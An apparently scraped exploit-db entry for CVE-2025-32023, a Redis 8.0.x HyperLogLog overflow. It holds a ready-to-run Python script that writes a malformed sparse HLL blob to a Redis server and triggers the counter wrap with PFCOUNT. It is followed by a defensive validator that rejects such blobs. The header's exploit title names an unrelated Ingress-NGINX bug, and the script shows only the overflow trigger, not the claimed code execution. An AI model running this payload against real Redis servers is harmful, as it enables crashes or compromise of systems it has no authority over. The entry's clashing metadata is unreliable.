[remote] Redis 8.0.2 - RCE
This article describes a vulnerability in Redis's HyperLogLog data structure (CVE-2025-32023), affecting versions 8.0.0 through 8.0.3. A crafted HLL payload triggers an overflow, leading to remote code execution (RCE). 2026-02-04 00:00:00 Author: www.exploit-db.com (view original) Views: 3

# Exploit Title:  Ingress-NGINX Admission Controller v1.11.1 - FD Injection to RCE 
# Date: 2025-10-07
# Exploit Author: Beatriz Fresno Naumova
# Vendor Homepage: https://redis.io/
# Software Link: https://redis.io/
# Version: Affects >= 8.0.0, < 8.0.3
# Tested on: Ubuntu 22.04
# CVE: CVE-2025-32023

import redis
import sys

# --- Configuration ---
REDIS_HOST = 'localhost'
REDIS_PORT = 6379
REDIS_KEY = 'hll:exp'

# HLL encoding type (1 = sparse)
HLL_SPARSE = 1


def p8(value):
    """Convert integer to single byte."""
    return bytes([value])


def xzero(size):
    """
    Construct an 'xzero' run for sparse HLL:
    Creates a run-length encoding entry of zeroes with a specific size.
    """
    if not (1 <= size <= 0x4000):
        raise ValueError("Invalid xzero size: must be between 1 and 0x4000")
    size -= 1
    return p8(0b01_000000 | (size >> 8)) + p8(size & 0xff)


def build_malformed_hll():
    """
    Construct a malformed HLL payload that overflows internal counters.
    """
    payload = b'HYLL'                # Magic header
    payload += p8(HLL_SPARSE)        # Encoding type: sparse
    payload += p8(0) * 3             # Reserved
    payload += p8(0) * 8             # Unused (padding)
    
    assert len(payload) == 0x10      # Check header size
    
    # Append enough xzero runs to cause overflow
    payload += xzero(0x4000) * 0x20000  # == -0x80000000 when cast to signed int

    # Add one more run to complete the structure
    payload += p8(0b11111111)  # Runlen=4, regval=0x20 (but malformed)

    return payload


def main():
    try:
        print(f"[*] Connecting to Redis at {REDIS_HOST}:{REDIS_PORT}...")
        r = redis.Redis(REDIS_HOST, REDIS_PORT)

        print("[*] Building malformed HyperLogLog payload...")
        hll_payload = build_malformed_hll()

        print(f"[*] Writing malformed HLL to key: {REDIS_KEY}")
        r.set(REDIS_KEY, hll_payload)

        print("[*] Triggering HLL merge operation (pfcount)...")
        r.pfcount(REDIS_KEY, REDIS_KEY)

        print("[+] Exploit triggered successfully.")
    except Exception as e:
        print(f"[!] Exploit failed: {e}")
        sys.exit(1)


if __name__ == "__main__":
    main()
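The sparse HLL format the script above abuses can be checked before a blob is trusted. The validator below is an added example, not Redis's own code and not part of the exploit-db entry: it decodes the ZERO/XZERO/VAL opcodes that follow the 16-byte HYLL header, keeps a running register index, and rejects any blob whose runs cover more than the 16384 registers a Redis HLL holds, which is exactly the invariant the 0x20000 XZERO runs break. The function names, the sample blobs and the "reject before accounting the run" ordering are constructed here; the opcode layout follows the Redis sparse encoding.

```python
# Added example: a standalone validator for Redis sparse HyperLogLog blobs.
# Not Redis's own code and not part of the exploit-db entry. The byte layout
# follows the Redis sparse encoding: 'HYLL' header, then ZERO/XZERO/VAL opcodes.

HLL_REGISTERS = 1 << 14   # a Redis HLL has 2^14 registers (P = 14)
HLL_HDR_SIZE = 16         # 'HYLL' + encoding byte + 3 reserved + 8 cached cardinality
HLL_SPARSE = 1


def encode_xzero(size):
    """XZERO opcode: 01xxxxxx yyyyyyyy, a 14-bit run length minus one."""
    if not 1 <= size <= 1 << 14:
        raise ValueError("XZERO run length must be 1..16384")
    size -= 1
    return bytes([0x40 | (size >> 8), size & 0xff])


def encode_val(value, runlen):
    """VAL opcode: 1vvvvvll, register value 1..32 repeated 1..4 times."""
    if not (1 <= value <= 32 and 1 <= runlen <= 4):
        raise ValueError("VAL value must be 1..32, runlen 1..4")
    return bytes([0x80 | ((value - 1) << 2) | (runlen - 1)])


def sparse_blob(*runs):
    """Assemble a sparse-encoded blob: 16-byte header followed by opcodes."""
    header = b'HYLL' + bytes([HLL_SPARSE]) + bytes(3) + bytes(8)
    return header + b''.join(runs)


def decode_sparse_runs(blob):
    """Yield (opcode, runlen, value) for each opcode in the body of a sparse blob."""
    if len(blob) < HLL_HDR_SIZE or blob[:4] != b'HYLL':
        raise ValueError("not an HLL blob")
    if blob[4] != HLL_SPARSE:
        raise ValueError("not sparse-encoded")
    body = blob[HLL_HDR_SIZE:]
    i = 0
    while i < len(body):
        b = body[i]
        if b & 0x80:                                   # VAL: one byte
            yield ('VAL', (b & 0x03) + 1, ((b >> 2) & 0x1f) + 1)
            i += 1
        elif b & 0x40:                                 # XZERO: two bytes
            if i + 1 >= len(body):
                raise ValueError("truncated XZERO opcode")
            yield ('XZERO', (((b & 0x3f) << 8) | body[i + 1]) + 1, 0)
            i += 2
        else:                                          # ZERO: one byte
            yield ('ZERO', (b & 0x3f) + 1, 0)
            i += 1


def validate_sparse_hll(blob):
    """
    Walk the opcodes with a running register index and return
    (ok, registers_covered, reason). A well-formed sparse HLL covers exactly
    HLL_REGISTERS registers. The bound is checked before each run is added,
    so an oversized run is rejected before any counter could wrap.
    """
    idx = 0
    for opcode, runlen, _value in decode_sparse_runs(blob):
        if idx + runlen > HLL_REGISTERS:
            return (False, idx + runlen,
                    f"{opcode} run of {runlen} overruns the {HLL_REGISTERS} registers")
        idx += runlen
    if idx != HLL_REGISTERS:
        return (False, idx, f"runs cover {idx} registers, expected {HLL_REGISTERS}")
    return (True, idx, "ok")


# Constructed samples (not taken from any real Redis instance).
EMPTY_HLL = sparse_blob(encode_xzero(HLL_REGISTERS))            # shape of a fresh key
SMALL_HLL = sparse_blob(encode_xzero(100), encode_val(5, 1),
                        encode_xzero(HLL_REGISTERS - 101))       # one register set
OVERRUN_HLL = sparse_blob(encode_xzero(HLL_REGISTERS) * 0x20000,
                          encode_val(32, 4))                     # same shape as the payload above


if __name__ == "__main__":
    for name, blob in [("empty", EMPTY_HLL), ("small", SMALL_HLL), ("overrun", OVERRUN_HLL)]:
        print(name, validate_sparse_hll(blob))
```

The validator stops at the second XZERO run of the oversized sample, long before the 0x20000 runs would have pushed a 32-bit accumulator past 0x7fffffff; that early bound check, applied per opcode rather than only on the final total, is the property a defender wants from any code that consumes attacker-controlled HLL blobs.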
            

Source: https://www.exploit-db.com/exploits/52477